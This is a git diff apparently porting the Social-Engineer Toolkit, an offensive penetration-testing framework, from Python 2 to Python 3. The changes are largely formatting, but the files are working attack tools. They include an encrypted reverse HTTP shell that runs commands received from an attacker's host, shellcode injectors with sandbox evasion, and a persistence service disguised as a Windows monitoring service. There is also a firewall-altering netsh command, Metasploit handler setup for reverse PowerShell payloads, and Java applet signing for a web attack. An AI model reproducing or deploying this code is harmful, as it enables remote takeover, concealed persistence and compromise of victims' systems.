# mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
os.chdir("src/html/unsigned")
print """
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
@ -24,7 +25,7 @@ print """
State: Ohio
Country: US
Is this correct: yes
"""
""")
print_error("*** WARNING ***")
print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
@ -34,10 +35,12 @@ print_error("*** WARNING ***")
random_string = generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait()
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" %
(random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait()
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" %
(random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()

101
src/html/unsigned/verified_sign.py
View file

@ -16,13 +16,14 @@ from src.core.setcore import *
###########################################################
# based on the new update to Java, this no longer works and just shows a big "UNKNOWN".
# to get around that you can purchase your own digital certificate through verisign/thawte
# to get around that you can purchase your own digital certificate through
# verisign/thawte
# grab current path
definepath = definepath()
# print warning message that we need to install sun-java or openjdk
print """
print("""
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
@ -35,16 +36,17 @@ print """
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
business, buy a code signing certificate, and publish an applet to be whatever you want. You can also do a "DBA" or doing
business as which is also much easier to use.
"""
""")
print_error("*** WARNING ***")
print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
print_error("*** WARNING ***")
# use flag is in case someone already has a code signing certificate, in that case it bypasses the "no" answer
# use flag is in case someone already has a code signing certificate, in
# that case it bypasses the "no" answer
use_flag = 0
print """
print("""
[--------------------------------]
Initial Selection Process
[--------------------------------]
@ -56,18 +58,20 @@ Option 2 will go through the process of either creating the code signing certifi
1. Import your own java applet into SET (needs to be SIGNED).
2. Either create a code-signing csr or use a code-signing certificate you already own.
"""
firstprompt = raw_input("Enter your choice [1-2]: ")
if firstprompt == "": firstprompt == "2"
""")
firstprompt = input("Enter your choice [1-2]: ")
if firstprompt == "":
firstprompt == "2"
# if we want to import our own java applet
if firstprompt == "1":
newpath = raw_input("Enter the path to the .jar file: ")
newpath = input("Enter the path to the .jar file: ")
if not os.path.isfile(newpath):
while 1:
print_error("Unable to locate the file. Please try again.")
newpath = raw_input("Enter the path to the .jar file: ")
if os.path.isfile(newpath): break
newpath = input("Enter the path to the .jar file: ")
if os.path.isfile(newpath):
break
# import into SET
print_status("Importing the applet into SET for weaponization...")
@ -75,33 +79,41 @@ if firstprompt == "1":
shutil.copyfile(newpath, setdir + "/Signed_Update.jar")
print_status("The applet has been successfully imported into SET.")
# if we want to either generate a certificate or use our own certificate this is it
# if we want to either generate a certificate or use our own certificate
# this is it
if firstprompt == "2":
# prompt for a different certificate
prompt = raw_input(setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
prompt = input(setprompt(
"0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path=raw_input(setprompt("0", "Path to the code signing certificate file (provided by CA)"))
cert_path = input(
setprompt("0", "Path to the code signing certificate file (provided by CA)"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path=raw_input(setprompt("0", "Path to the .cer certificate file"))
cert_path = input(
setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
if os.path.isfile(cert_path):
break
# here is where we import the certificate
try:
print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
subprocess.Popen("keytool -import -alias MyCert -file %s" %
(cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the
# request process below
use_flag = 1
# exception here in case it was already imported before
except: pass
except:
pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
@ -116,46 +128,61 @@ if firstprompt == "2":
# get the stuff ready to do it
print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1=raw_input(setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
answer1 = input(
setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2=raw_input(setprompt("0", "Name of the organization"))
answer2 = input(setprompt("0", "Name of the organization"))
# grab two letter country code
answer3=raw_input(setprompt("0", "Two letter country code (ex. US)"))
answer3 = input(
setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if answer3 == "": answer3 = "US"
if answer3 == "":
answer3 = "US"
# grab state
answer4=raw_input(setprompt("0", "State"))
answer4 = input(setprompt("0", "State"))
# grab city
answer5=raw_input(setprompt("0", "City"))
answer5 = input(setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' %
(answer1, answer2, answer3, answer4, answer5), shell=True).wait()
print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
print_status("Export successful. Exported certificate under the SET root under certreq.txt")
print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
subprocess.Popen(
"keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
print_status(
"Export successful. Exported certificate under the SET root under certreq.txt")
print_warning(
"You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
print_warning(
"Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = raw_input(setprompt("0", "Path for the code signing certificate file (.spc file)"))
cert_path = input(
setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = raw_input(setprompt("0", "Path to the .cer certificate file from Verisign"))
cert_path = input(
setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path): break
if os.path.isfile(cert_path):
break
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
subprocess.Popen("keytool -import -alias MyCert -file %s" %
(cert_path), shell=True).wait()
# if our certificate is in the data store
if os.path.isfile(cert_path):
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" %
(definepath), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar %s/Signed_Update.jar.orig" % (setdir), shell=True).wait()
subprocess.Popen(
"mv Signed_Update.jar %s/Signed_Update.jar.orig" % (setdir), shell=True).wait()
# move back to original directory
print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
print_status(
"Java Applet is now signed and will be imported into the java applet website attack from now on...")

8
src/html/web_start.py
View file

@ -3,7 +3,9 @@
import sys
import setcore
me = setcore.mod_name()
setcore.debug_msg(me,"importing 'src.html.spawn'",1)
setcore.debug_msg(me, "importing 'src.html.spawn'", 1)
sys.path.append("src/html")
try: reload(spawn)
except: pass
try:
reload(spawn)
except:
pass

2
src/payloads/powershell/powershell_shellcode.code
View file

@ -1,6 +1,6 @@
<#
Powershell Code Execution 'Exploit'
Author: Matthew Graeber
Author: Matthew Graeber (aka my superhero infosec crush)
Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions.
#>

100
src/payloads/powershell/prep.py
View file

@ -8,8 +8,10 @@ from src.core.setcore import *
# grab stage encoding flag
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off": stage_encoding = "false"
else: stage_encoding = "true"
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = check_options("POWERSHELL_SOLO")
@ -25,22 +27,25 @@ pyinjection = check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(setdir + "/payload_options.shellcode"):
pyinjection = "on"
print_status("Multi/Pyinjection was specified. Overriding config options.")
else: pyinjection = "off"
pyinjection = "on"
print_status(
"Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter the ipaddress for the reverse connection: ")
ipaddr = input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on": multi_injection = "off"
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
@ -55,18 +60,24 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
if pyinjection == "off":
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/meta_config_multipyinjector" % (setdir), "r")
print_status(
"POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" %
(powershell_inject_x86, ipaddr, port, stage_encoding))
filewrite.close()
# if we have multi injection on, don't worry about these
@ -78,19 +89,22 @@ if multi_injection != "on":
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
port = input(setprompt(
["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on":
if pyinjection == "off":
print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
print_status(
"Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
@ -108,69 +122,81 @@ if multi_injection == "on":
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status("Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
print_status(
"Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), ports)
port_check = check_ports(
"%s/meta_config_multipyinjector" % (setdir), ports)
if port_check == False:
filewrite = file("%s/meta_config_multipyinjector" % (setdir), "a")
filewrite = open(
"%s/meta_config_multipyinjector" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/meta_config" % (setdir)):
filewrite = file("%s/meta_config" % (setdir), "w")
filewrite = open("%s/meta_config" % (setdir), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/meta_config" % (setdir), ports)
if port_check == False:
filewrite = file("%s/meta_config" % (setdir), "a")
filewrite = open("%s/meta_config" % (setdir), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (
powershell_inject_x86, ipaddr, stage_encoding, ports))
filewrite.close()
# here we do everything if pyinjection or multi pyinjection was specified
if pyinjection == "on":
multi_injection_x86 = ""
# read in the file we need for parsing
fileopen = file(setdir + "/payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
fileopen = open(setdir + "/payload_options.shellcode", "r")
payloads = fileopen.read()[:-1].rstrip() # strips an extra ,
payloads = payloads.split(",")
# format: payload<space>port
for payload in payloads:
#format: payload<space>port
# format: payload<space>port
payload = payload.split(" ")
powershell_inject_x86 = payload[0]
port = payload[1]
port = payload[1]
print_status("Generating x86-based powershell injection code...")
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
multi_injection_x86 = multi_injection_x86 + "," + \
generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if its turned to off
if multi_injection == "off":
if pyinjection == "off":
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
x86 = generate_powershell_alphanumeric_payload(
powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on" or pyinjection == "on":
x86 = multi_injection_x86[1:] # remove comma at beginning
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print x86
print(x86)
filewrite = file("%s/x86.powershell" % (setdir), "w")
filewrite = open("%s/x86.powershell" % (setdir), "w")
filewrite.write(x86)
filewrite.close()
print_status("Finished generating powershell injection bypass.")

50
src/payloads/set_payloads/http_shell.py Executable file → Normal file
View file

@ -1,5 +1,5 @@
#!/usr/bin/python
##########################################################################################################################
##########################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
@ -7,41 +7,41 @@
# Dave Kennedy (ReL1K)
# http://www.trustedsec.com
#
##########################################################################################################################
##########################################################################
#
##########################################################################################################################
##########################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
##########################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
##########################################################################
#
##########################################################################################################################
##########################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
##########################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
##########################################################################
import urllib
import urllib2
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
from Crypto.Cipher import AES
import sys
import os
import httplib
import http.client
import subprocess
import base64
import time
@ -79,11 +79,11 @@ PASSWORD = "password_here"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler = urllib.request.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
opener = urllib.request.build_opener(auth_handler)
urllib.request.install_opener(opener)
try:
# our reverse listener ip address
@ -93,19 +93,19 @@ try:
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.trustedsec.com"
print "Usage: shell.exe <reverse_ip_address> <rport>"
print(" \nAES Encrypted Reverse HTTP Shell by:")
print(" Dave Kennedy (ReL1K)")
print(" http://www.trustedsec.com")
print("Usage: shell.exe <reverse_ip_address> <rport>")
time.sleep(0.1)
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
req = urllib.request.Request('http://%s:%s' % (address, port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
message = urllib.request.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
@ -115,7 +115,8 @@ while 1:
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc = subprocess.Popen(message, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
@ -123,10 +124,11 @@ while 1:
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
data = urllib.parse.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
h = http.client.HTTPConnection('%s:%s' % (address, port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)

546
src/payloads/set_payloads/listener.py Executable file → Normal file
View file

File diff suppressed because it is too large Load diff

196
src/payloads/set_payloads/multi_pyinjector.py Executable file → Normal file
View file

@ -1,96 +1,100 @@
#
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.4
#
# This will spawn only a seperate thread per each shellcode instance.
#
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import sys
import subprocess
import os
import base64
from Crypto.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")
sc = bytearray(sc)
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
if __name__ == '__main__':
multiprocessing.freeze_support()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
sc = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
sc = DecryptAES(cipher, sc)
# split our shellcode into a list
sc = sc.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in sc:
if payload != "":
p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p)
p.start()
#
# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
# Version: 0.4
#
# This will spawn only a seperate thread per each shellcode instance.
#
# Much cleaner and optimized code. No longer needs files and is passed via
# command line.
#
# Incorporates AES 256 Encryption when passing shellcode
import ctypes
import sys
import subprocess
import os
import base64
from Crypto.Cipher import AES
import multiprocessing
import threading
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# define our shellcode injection code through ctypes
def injection(sc):
sc = sc.decode("string_escape")
sc = bytearray(sc)
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(sc)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr),
ctypes.c_int(len(sc)))
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(sc)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(
ctypes.c_int(ht), ctypes.c_int(-1))
if __name__ == '__main__':
multiprocessing.freeze_support()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable",
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = open(payload_filename, "r")
sc = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(
base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
sc = DecryptAES(cipher, sc)
# split our shellcode into a list
sc = sc.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in sc:
if payload != "":
p = multiprocessing.Process(target=injection, args=(payload,))
jobs.append(p)
p.start()

40
src/payloads/set_payloads/persistence.py Executable file → Normal file
View file

@ -1,19 +1,19 @@
#!/usr/bin/python
#
#####################################################################################################################
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
#####################################################################################################################
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see output of this program running python site-packages\win32\lib\win32traceutil for debugging
#
#####################################################################################################################
##########################################################################
import win32service
import win32serviceutil
@ -27,32 +27,33 @@ import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self,args):
win32serviceutil.ServiceFramework.__init__(self,args)
self.hWaitStop=win32event.CreateEvent(None, 0, 0, None)
self.isAlive=True
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive=False
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout=1000 # In milliseconds (update every second)
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir=os.environ['WINDIR']
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
@ -62,15 +63,18 @@ class aservice(win32serviceutil.ServiceFramework):
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen=file("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to AppData instead
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen=file("%s\\isjxwqjs" % (homedir_path), "r")
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and written when persistence is called
set_path=line.rstrip()
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
@ -85,7 +89,7 @@ if __name__ == '__main__':
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error, details:
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:

111
src/payloads/set_payloads/pyinjector_args.py Executable file → Normal file
View file

@ -1,55 +1,56 @@
#!/usr/bin/python
import ctypes
import sys
import multiprocessing
# Written by Dave Kennedy (ReL1K) @ TrustedSec.com
# Injects shellcode into memory through Python and ctypes
#
# Initial awesome code and credit found here:
# http://www.debasish.in/2012_04_01_archive.html
# added sandbox evasion here - most sandboxes use only 1 core
if multiprocessing.cpu_count() < 2:
exit()
# see if we specified shellcode
try:
sc = sys.argv[1]
# if we didn't specify a param
except IndexError:
sys.exit()
# need to code the input into the right format through string escape
sc = sc.decode("string_escape")
# convert to bytearray
sc = bytearray(sc)
